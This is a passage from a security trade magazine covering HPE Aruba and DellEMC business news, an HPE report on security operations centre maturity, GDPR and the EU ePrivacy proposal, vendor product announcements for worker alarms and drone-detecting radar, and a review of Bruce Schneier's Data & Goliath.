Super Bowl. Through an app, we can deliver food and beverage right to the seat. This also allows targeted merchandise offers, such as a cold beer offer if they are sitting in the sun. So it is creating lots of new ways you can interact with your customers, and this is driving the growth; in some cases it is the marketing department that is buying the network. In hospitality, we have recently won the contract for the MGM Casino in Macau, and now four of the six largest casinos are standardised on Aruba.
We have found the Aruba brand a real differentiator for setting apart the business networking unit, which I’m in charge of for the Asia Pacific. Having joined with HPE we have gone on to win the Home Depot in North America, which is a US$120 million order, the single biggest order in the history of HP networking, and formerly a premium Cisco account. We also won BestBuy, United Airlines and the Department of Defence in Australia. Defence is probably our biggest single customer in the world on the Aruba side because of the Class B security that we can bring and encrypt in the air, which is a feature defence find very attractive and that has made us very strong across the defence industry around the world. Our ClearPass product is our leading product because it securitises the perimeter of the network, and the network edge is now mobile. So the way in which you once provided security to your switch and branch office network, by putting in firewalls and locking down each user at a desk – those rules don’t apply anymore. Our secure mobility product ClearPass allows CIOs to get security around a perimeter they can no longer see, and if they can see it, provides them the context. Aruba is also responsible for the IoT strategy of HPE, and our compute platforms Edgeline and Moonshot are sitting right at the very edge of the network. The Moonshot cartridge sits inside the edge of the network and Edgeline is a compute engine that can pick up a lot of data, analyse it and shoot it back to the IoT device rather than going all the way through to the branch and into the datacentre and then back out again. This reduces the latency, so you don’t have to wait for the instruction to turn the switch off, be it a controller such as for air-conditioning or lighting. As these formerly analogue systems are becoming connected IoT devices sitting at the edge of networks, the way the instructions are being transported is over wireless and Wi-Fi networks, so we have a number of solutions in this space.
// HPE ARUBA EXECUTIVE PROFILE | STEVE WOOD
Steve Wood is responsible for leading the networking business unit for Hewlett Packard Enterprise across the Asia Pacific region. Prior to this role, he served as Chairman of the Aruba Networks Advisory Board in Australia. An accomplished Chief Executive in the technology, sports and media sectors, Steve has led the Asia Pacific operations of numerous high-growth technology businesses. He was most recently Chief Executive Officer of Tennis Australia, where he was responsible for the Australian Open Grand Slam and the national tennis industry. He has also served as President of Australia & New Zealand for Nortel Networks and Vice President of Asia Pacific for Alteon WebSystems, and has previously held leadership positions at Bay Networks, SynOptics Communications Inc. and MPA International. Steve currently serves as Chairman of the Board for the University of Melbourne Networked Society Institute, Australia's premier research institute in broadband technologies. Steve holds a Bachelor of Business Administration from Louisiana State University.
// HEWLETT PACKARD ENTERPRISE REPORT REVEALS TRIALS AND ERRORS OF SECURITY OPERATIONS
SOCs forgo security basics, leaving 82 percent of organisations below target maturity levels and vulnerable
The fourth annual State of Security Operations Report 2017 provides insight into and analysis of the effectiveness of security operations centres (SOCs), and best practices for mitigating risk in an evolving cybersecurity landscape. With increased pressure to align security initiatives with business goals, an organisation’s SOC provides the foundation for how it protects its most sensitive assets and detects and responds to threats. The report’s findings show that the majority of SOCs are falling below target maturity levels, leaving organisations vulnerable in the event of an attack. Nearly 140 SOCs in more than 180 assessments around the globe were examined and measured on the HPE Security Operations Maturity Model (SOMM) scale, which evaluates people, processes, technology and business capabilities. A SOC that is well-defined, subjectively evaluated and flexible is recommended for any modern enterprise; however, 82 percent of SOCs were found to be failing to meet these criteria and falling below the optimal maturity level.
Key Observations
• SOC maturity decreases with hunt-only programs. The implementation of hunt teams to search for unknown threats has become a major trend in the security industry. While organisations that added hunt teams to their existing real-time monitoring capabilities increased their maturity levels, programs that focused solely on hunt teams had an adverse effect.
• Complete automation is an unrealistic goal. A shortage of security talent remains the number one concern for security operations, making automation a critical component of any successful SOC. However, advanced threats still require human investigation and risk assessments need human reasoning, making it imperative that organisations strike a balance between automation and staffing.
• Focus and goals are more important than size of organisation. There is no link between the size of a business and the maturity of its cyber defence centre. Instead, organisations that use security as a competitive differentiator, for market leadership, or to create alignment with their industry are better predictors of mature SOCs.
• Hybrid solutions and staffing models provide increased capabilities. Organisations that keep risk management in-house and scale with external resources, such as leveraging managed security services providers (MSSPs) for co-staffing or in-sourcing, can boost their maturity and address the skills gap.
// DELLEMC MERGER: GLOBAL CHANNEL PARTNER PROGRAM LAUNCHES FEBRUARY 1ST
Having merged early in September, DellEMC’s John Byrne, President Global Channel, was in Macau seven weeks later briefing APAC channel partners on the newly formed company’s revised channel leadership team and channel partner programme. At the time of the merger, EMC had 800 channel partners and Dell had 3,000, with the combined channel market sitting at US$35 billion and growing 3-4 times faster than the rest of the market. Globally, 53% of the business sold through channel partners, but across APJ (Asia Pacific & Japan) the rate was much higher, sitting at 69%, with India and China in the top three countries in terms of sales and the region growing 6 times faster than the rest of the market. Throughout the merger process there were partner advisory boards, partner councils and a global partner webcast with 2,000 partners to discuss how a new growth engine would work. John Byrne highlighted, “we want to grow from the top lines as well as to the bottom lines”. Even at US$35 billion, DellEMC considers itself a ‘dark horse’ because it still sees so much upside. Within the new Dell EMC structure is the PC Organisation, or the Client organisation, the Infrastructure Solutions Group (ISG), and Services. Within these areas there are three sales segments: Enterprise, Commercial and Consumer Small Business (CSB). The global channel sales organisation has been centralised and launches the DellEMC Partner Program as a new channel program. The program will be based on three key elements: simplicity, predictability and profitability. Channel partners will be allocated based on Tiers and Tracks, and were awaiting the final criteria, announced in December, which will define where the partners sit. The new program will be effective as of February 1, 2017. The Dell and EMC channel programs have been working separately until the February launch, but both Dell and EMC had made significant progress in selling through the channel, and John Byrne acknowledges the channel community is changing significantly: “they do not want to be treated like resellers.” Channel tiers include Gold, Platinum and Titanium, and despite only three tiers there remains a special extra tier, Titanium Black. The tracks represent channel profiles: SP (Solution Providers), OEM (Original Equipment Manufacturers), CSPs (Cloud Solution Providers), MSPs (Managed Service Providers), RSA, remaining the security division, and Virtustream. Pivotal, SecureWorks and VMware are all remaining separate as part of Dell Technologies. John Byrne asserted confidently, “the advantage is that we can now offer the end to end solutions, from the PC to the cloud, services and the widest portfolio of products. DellEMC spent $4.5 billion on research and development and that is double that of the competition – and we remain dominant in 20 of Gartner’s Magic Quadrants. We’re number one on several fronts. DellEMC is the fastest growing PC company and number one in servers, number one in workstations and fastest growing in storage. We want to be number one of everything.” IoT is naturally seen as a big market. An example of a DellEMC smart city partner project involves 100,000 vehicles equipped with GPS devices, tracking the movement of the cars and using Dell solutions to analyse the car movements to design traffic management policies. Another, in a Thailand province, is working with the ageing population: seniors are tracked with wearable devices connected to hospitals, with data being analysed for health benefits and early medical response.
Also in late October, LogRhythm announced that it had formed a worldwide resale partnership with Dell EMC, with LogRhythm being one of Dell EMC’s largest OEM customers. LogRhythm uses Dell servers and storage to build security appliances for rapid threat detection and response solutions, a market which Gartner expects to reach US$23 billion by 2020. LogRhythm’s Security Intelligence and Analytics Platform unifies next-generation SIEM, log management, network monitoring, endpoint monitoring, and advanced security analytics. It also helps organisations meet compliance requirements and respond to IT operations and events. “Demand for solutions that can detect and neutralise cyber adversaries before they can cause a material breach has never been greater,” said Mike Reagan, chief marketing officer at LogRhythm. “This partnership with Dell EMC bolsters our ability to capitalise on this burgeoning market by bringing our award-winning security intelligence and analytics solutions to more enterprises around the world.”
// PRIVACY AND NATIONAL SECURITY
Briefing by Rachel Lachford, Vice President Marketing, Canalys
The European Union General Data Protection Regulation (GDPR) will enter into application on 25 May 2018 after a two-year transition period. The wider implications of the GDPR are focused on data privacy controls without country or regional boundaries. This reflects the nature of the data flows that are being enabled by new technologies and the creative and disruptive business models emerging in new digital economies. Over half the countries in the world now have some form of data protection or privacy laws, and many of those are strongly influenced by the EU approach. What we are now starting to see is a trend towards global ubiquity of data privacy emerging. The EU GDPR is probably the most ambitious endeavour so far in terms of securing the rights of the individual in the digital realm. This is probably the case for this generation, as the rules were last created in 1995, and so finally we have this huge refresh that adopts the technological advancements of the last twenty years. The requirement to conform to the GDPR will prevail, not only within the EU but across a majority of countries, and will have significant impact on a global level. This will start to create a new standard for all data processes and transfers across the globe. This will initially impact most those companies that are operating internationally, but will also see a ripple-down effect into country-level business operations. 2017 will see more conversations within the business communities, of all sizes, around data privacy regulations and will be a critical year in Europe for implementation, with compliance required by 2018. This is not just a ‘large’ company issue; even in the SMB market, they will need to be thinking about how they are going to comply and combat the myriad of threats and emerging threats across the global supply chain. SMBs make up a majority of supply chains and though they may tend to operate on a small local scale, if they are linked to a global supply chain then they will be impacted. Data transfers know no boundaries. As we move to 2020, the numbers suggest a proliferation of IoT devices, and there will be an overwhelming bulk of industrial devices that are transferring digital information and will fall into the realm of privacy and data transfer regulations. Japan, as an example, is looking to reform and implement its own regulations and will be a certified country approved to deal with EU countries. This will be a global issue around privacy and data encryption. Cloud is also a major factor in the reason this becomes relevant to everybody. If you are hosting applications, finance, CRM or any business process, where is the data being hosted from and transferred to? Cloud providers are bringing new requirements into their contracts, such as wording similar to “it is your responsibility to encrypt the data that is being sent to your customers”. The primary responsibilities will be to encrypt data when sending to customers and to notify of any breaches within 72 hours. Sanctions will be a big incentive for businesses to protect themselves. We’re seeing the implementation of large fines in the EU and US, and South Korea has introduced punitive damages to some stringent privacy laws. In the last 18 months Hong Kong has seen three convictions under its direct marketing legislation, with fines of HK$10,000 and HK$30,000 issued. This is about ‘big data’ but more focused on ‘big personal data’: working out what is personal and what is not, and developing a trust system of data protection with accountability, privacy by design, clarity and an understanding of what sanctions will be applied. Companies are encouraged to get back to basics: have data discovery processes, data privacy and risk assessment processes, provide staff training, develop user awareness and training, and historically, user awareness is a key to success.
// COMMISSION PROPOSES HIGH LEVEL OF PRIVACY RULES FOR ALL ELECTRONIC COMMUNICATIONS AND UPDATES DATA PROTECTION RULES FOR EU
The Proposal for a Regulation on Privacy and Electronic Communications aims to update current rules, extending their scope to all electronic communication providers. It also aims to create new possibilities to process communication data and reinforce trust and security in the Digital Single Market – a key objective of the Digital Single Market strategy. At the same time, the proposal aligns the rules for electronic communications with the new world-class standards of the EU's General Data Protection Regulation. First Vice-President Timmermans said: "Our proposals will complete the EU data protection framework. They will ensure that the privacy of electronic communications is protected by up to date and effective rules, and that European institutions will apply the same high standards that we expect from our Member States." Věra Jourová, Commissioner for Justice, Consumers and Gender Equality, said: "We are also setting out our strategy to facilitate international data exchanges in the global digital economy and promote high data protection standards worldwide."
Better online protection and new business opportunities
The proposed Regulation on Privacy and Electronic Communications will increase the protection of people's private life and open up new opportunities for business:
• New players: 92% of Europeans say it is important that their emails and online messages remain confidential. However, the current ePrivacy Directive only applies to traditional telecoms operators. Privacy rules will now also cover new providers of electronic communications services, such as WhatsApp, Facebook Messenger, Skype, Gmail, iMessage, or Viber.
• Stronger rules: By updating the current Directive with a directly applicable Regulation, all people and businesses in the EU will enjoy the same level of protection for their electronic communications. Businesses will also benefit from one single set of rules across the EU.
• Communications content and metadata: Privacy will be guaranteed for both content and metadata derived from electronic communications (e.g. time of a call and location). Both have a high privacy component and, under the proposed rules, will need to be anonymised or deleted if users have not given their consent, unless the data is required, for instance, for billing purposes.
• New business opportunities: Once consent is given for communications data, both content and/or metadata, to be processed, traditional telecoms operators will have more opportunities to use data and provide additional services. For example, they could produce heat maps indicating the presence of individuals to help public authorities and transport companies when developing new infrastructure projects.
• Simpler rules on cookies: The so-called "cookie provision", which has resulted in an overload of consent requests for internet users, will be streamlined. New rules will allow users to be more in control of their settings, providing an easy way to accept or refuse the tracking of cookies and other identifiers in case of privacy risks. The proposal clarifies that no consent is needed for non-privacy-intrusive cookies improving the internet experience (e.g. to remember shopping cart history). Cookies set by a visited website counting the number of visitors to that website will no longer require consent.
• Protection against spam: Today's proposal bans unsolicited electronic communication by any means, e.g. by emails, SMS and in principle also by phone calls, if users have not given their consent. Member States may opt for a solution that gives consumers the right to object to the reception of voice-to-voice marketing calls, for example by registering their number on a do-not-call list. Marketing callers will need to display their phone number or use a special prefix that indicates a marketing call.
• More effective enforcement: The enforcement of the confidentiality rules in the Regulation will be the responsibility of national data protection authorities.
International data protection
A strategic approach is being taken to the issue of international personal data transfers, with the aim of facilitating commercial exchanges and promoting better law enforcement cooperation, while ensuring a high level of data protection. The Commission plans to engage in discussions on reaching "adequacy decisions" (allowing for the free flow of personal data to countries with "essentially equivalent" data protection rules to those in the EU) with key trading partners in East and South-East Asia, starting with Japan and Korea in 2017. In addition, the Commission will also make full use of the other alternative mechanisms provided by the new EU data protection rules to facilitate the exchange of personal data with third countries with which adequacy decisions cannot be reached.
Next steps
With the presentation of the proposals in early January 2017, the Commission is calling on the European Parliament and the Council to work swiftly and to ensure their smooth adoption by 25 May 2018, when the General Data Protection Regulation will enter into application. The intention is to provide citizens and businesses with a fully-fledged and complete legal framework for privacy and data protection in Europe by this date.
Within TechTime you will find the very latest information, news and products from a wide variety of security industries, including cameras, computers, software and hardware.
Spotter RF: A2000
TechTime - latest news and products
Multitone launches 'EkoSecure' for campus worker protection
Multitone Electronics has announced the launch of its EkoSecure solution, for the campus or site-wide protection of workers. EkoSecure builds upon the company’s EkoTek staff protection system, featuring a wider coverage area which is ideal for outdoor and remote locations around any workplace facility. Husam Al-karnaz, Solutions Architect at Multitone, commented, “EkoSecure is a development of our highly successful EkoTek solution. It widens the coverage area using a mesh network of repeater units, which can be up to 60 metres apart, that extends the protection quickly and efficiently, reducing installation and operational costs.” Using the mesh network system also adds significant redundancy mitigation to the solution, as Husam continued, “Using this approach, if there is any failure in the network it can be instantly compensated for, the alarm raised and assistance called for, when a worker is in trouble. Additionally, the handheld EkoSecure device uses a loud audio alarm to direct a response team directly to the incident, which is vital in large areas where pinpointing a precise location can be a challenge.”
User pager
EkoSecure pagers offer four types of alarm, ensuring users are fully protected and that the assistance team is informed what type of emergency it is. These consist of:
• Red Button Alarm – A single or double press of the button will call for immediate assistance.
• Man Down Alarm – If the user falls, the alarm is raised after a short period.
• Snatch Alarm – Should the alarm be forcibly taken from the user.
• Deadman Alarm – The user is polled at predefined intervals and prompted to respond.
Interaction with EkoTek
As well as operating as a stand-alone solution, EkoSecure is also able to operate with Multitone’s EkoTek indoor staff protection system, for even greater flexibility and location accuracy. The new EkoSecure pager can be used to roam within the EkoTek mesh network and uses the repeaters for alarms and location in just the same way. Husam added, “EkoSecure is the perfect extension of the EkoTek system, allowing a user to roam an entire site or campus buildings, safe in the knowledge they are protected wherever they are. This is particularly useful around a large site such as a hospital, prison or university, with a broad mixture of different buildings and large outdoor spaces, where it would be very easy to go unnoticed if there were a problem.”
Alarm Escalation
Once an alarm has been triggered, the alert can be escalated to a rescue team via a choice of communications platforms, including mobile devices, DECT/Wi-Fi enabled phones or email/IM. This can also be automatically routed to different devices at different times to ensure the right person or team is alerted immediately. EkoSecure also logs all events for audit purposes. Husam concluded, “EkoSecure is a potentially life-saving solution which is perfect for lone worker protection, offering wide area coverage and reliability at a highly scalable and affordable price. It requires minimal training for use and can be installed rapidly, with additional capacity being simple to add, especially for customers that already use EkoTek for indoor emergency alerts.” To find out more about EkoSecure please visit the Multitone website: www.multitone.com or telephone 01506 418198.
About Multitone
As a pioneer of wireless messaging, Multitone Electronics plc is a specialist developer of integrated communication systems for on-site and global use. The organisation, which is best known for its supply of critical communications, continues to explore and develop reliable communications and controls, whilst offering robust, targeted systems that effectively and reliably integrate with customers’ existing systems and technologies. The product offering combines the best in wireless telephony, radio-paging systems and personal security systems with professional services and tailored software to create a truly cohesive communication platform. Multitone is part of Kantone Holdings, with a turnover in 2015 in excess of £224 million.
Information presented in TechTime is provided by the relevant advertiser and are not necessarily the views of My Security Media
TechTime - latest news and products
SpotterRF
Awards pile up for drone-detecting A2000 radar

SpotterRF caps off the year with worldwide praise for its new industry-leading A2000. This winning technology is the first compact surveillance radar (CSR) to provide cost-effective wide area deterrence against the growing threat of low-flying UAVs (drones) proliferating worldwide. SpotterRF also leads industry efforts to improve FAA rule changes allowing electrical utilities and other critical infrastructure to rapidly respond to incoming drones intent on destruction of people and property.

“The FAA estimates the number of commercial drones will explode from less than 20,000 to 600,000 in the coming year,” states Logan Harris, CEO for SpotterRF. “This increases risk of drone misuse against our critical infrastructure. We are pleased to provide immediate relief to power substations and others that have become targets due to the ability of low-cost drones that can carry dangerous payloads.”

The Spotter A2000 has garnered the 2016 Platinum Homeland Security Award, Best Drone Detection Perimeter Protection, from American Security Today; been named a 2016 ASIS International Accolades Winner; and most recently won Best Alarm & Detection Product 2016 from Detektor International, the only U.S. company so recognised by this European-based program. SpotterRF competed and was named winner among such industry goliaths as Axis, FLIR, Bosch, and Milestone Systems.

As a leader in drone detection technology, SpotterRF has shared its expertise on the topic during a recent Security Industry Association (SIA) webinar and in a SIA Technology Insights article. “We are pleased to work with SpotterRF to increase awareness of the unique dangers that can be created by drones,” SIA Director of Industry Relations Ron Hawkins said. “Their understanding of the nature of the threat and the countermeasures that are required can help security professionals to manage this new risk and keep people and property safe.”

SpotterRF is rapidly becoming the de facto standard for affordable wide area perimeter protection across the globe. Five of the top ten U.S. utility companies now use SpotterRF radar as a key component in protecting the nation’s electrical grid. SpotterRF delivers its award-winning compact surveillance radar (CSR) systems through more than 60 strategic integrators to a global marketplace in 24 countries on six continents. SpotterRF will be displayed along with IndustrialENET at the upcoming show, Distributech, held in San Diego on January 31 to February 2, at booth 4003.

About SpotterRF
SpotterRF provides protection beyond fences with the world’s most advanced Compact Surveillance Radar (CSR) system for perimeter security and force protection. Made in the USA and engineered for extreme conditions, SpotterRF technology is the most compact, lightweight, energy-efficient, and cost-effective radar for elite warfighters and critical infrastructure requirements, such as electrical utilities. For more information visit https://spotterrf.com/commercial-products/
EDITOR'S REPORT REVIEW
Data & Goliath by Bruce Schneier
As Bruce Schneier acknowledges, he doesn’t write a book from beginning to end but rather from bottom to top, working on the entire book at once. Bruce’s latest book, Data & Goliath, is about the biggest question of our time: how do we design systems that make use of our data collectively to benefit society as a whole, while at the same time protecting people individually? Schneier gives great credit to Edward Snowden and his ‘legacy’ of being the beginning of a worldwide movement that recognises privacy as a fundamental human right, which is applied in a “meaningful and enforceable way”.

Yet despite a perceived ‘worldwide movement for privacy’, Bruce takes the reader through the ominous extent of mass digital surveillance, by both government and corporations. Digital and electronic surveillance has developed to become capable of a rapidly progressive erosion of personal privacy, approaching the fulfilment of ubiquitous surveillance: in practice, the ‘panopticon’ conceptualised by philosopher Jeremy Bentham in the 1700s, a prison where every inmate can be surveilled at any time, unawares, so that the inmate has no choice but to conform. With our personal and daily data behaviours being stored, potentially forever, Schneier notes that an information-age surveillance state would go beyond even Bentham’s “wildest dreams”. The first two chapters should be enough to raise the eyebrows of even the average ‘aware’ reader.

Speaking as a former national law enforcement officer, where relationships and criminal contacts are reviewed across organised crime groups and across state and federal databases: metadata can be used to build not only organisational patterns of behaviour but individual patterns, in detail as effectively as a telephone intercept. Schneier highlights a Stanford University experiment that examined the phone metadata of 500 volunteers for several months; the deductions made from metadata alone included identifying an automatic weapons owner, a home marijuana grower, and personal health matters including someone having an abortion, someone suffering a heart attack, and someone diagnosed with multiple sclerosis. Schneier cites former NSA general counsel Stewart Baker: “metadata absolutely tells you everything about somebody’s life.
If you have enough metadata you don’t really need content.” Worse still, former NSA and CIA Director Michael Hayden is quoted, in 2014: “We kill people based on metadata.” Yet despite this capability, public security is not necessarily enhanced by mass capture of metadata, as is being attempted with Australia’s data retention laws. Schneier asserts: “there is no scientific rationale for believing that adding irrelevant data about innocent people makes it easier to find a terrorist attack, and lots of evidence that it does not. You might be adding slightly more signal but you’re also adding much more noise. And despite the NSA’s ‘collect it all’ mentality, its own documents bear this out. The military intelligence community even talks about this problem of “drinking from the fire hose”: having so much irrelevant data that it’s impossible to find the important bits.”

Yet the public is told that more mass surveillance is required to make us safer. The 9/11 Commission Report described a failure to ‘connect the dots’, which Schneier highlights: “the proponents of mass surveillance claim requires collection of more data. But what the report actually said was that the intelligence community had all the information about the plot without mass surveillance, and that the failures were the result of inadequate analysis…. Whenever we learn about an NSA success, it invariably comes from targeted surveillance rather than from mass surveillance.” I would argue this applies to Australian examples too.

Schneier asks the right questions and presents a comprehensive and factual account of international data and digital surveillance activities, which puts the ‘freedom’ of any western public at risk from future ‘unknown’ government policies. Schneier says, “The harms from mass surveillance are many, and the costs to individuals and society as a whole disproportionately outweigh the benefits. We can and must do something to rein it in.” I will leave it to you, the reader, to get this New York Times best seller and make your own mind up. Having heard Schneier speak publicly a number of times, and during my interview with him in Sydney last October, I’m convinced he has written a book every high school student should read, which is why I’m concerned that Australia’s Federal Attorney General, George Brandis, introduced mass data surveillance laws and then famously was unable even to define what metadata was when interviewed on national television. When law makers take away individual freedoms in a misguided belief they are doing good for the whole, it is indicative of a time when the system as a whole is fundamentally and irrevocably broken, and at our peril when faced with an unknown future.

Bruce Schneier, aged 53 years, is an American cryptographer, computer security and privacy specialist, and author. Having written several books on general security topics, computer security and cryptography, his latest book, ‘Data & Goliath’, is not only a best seller but a MUST read! Get your copy at https://www.schneier.com/books/data_and_goliath/
Have you recently published a security related book? Or have you just read a new, great security book? Please email us at firstname.lastname@example.org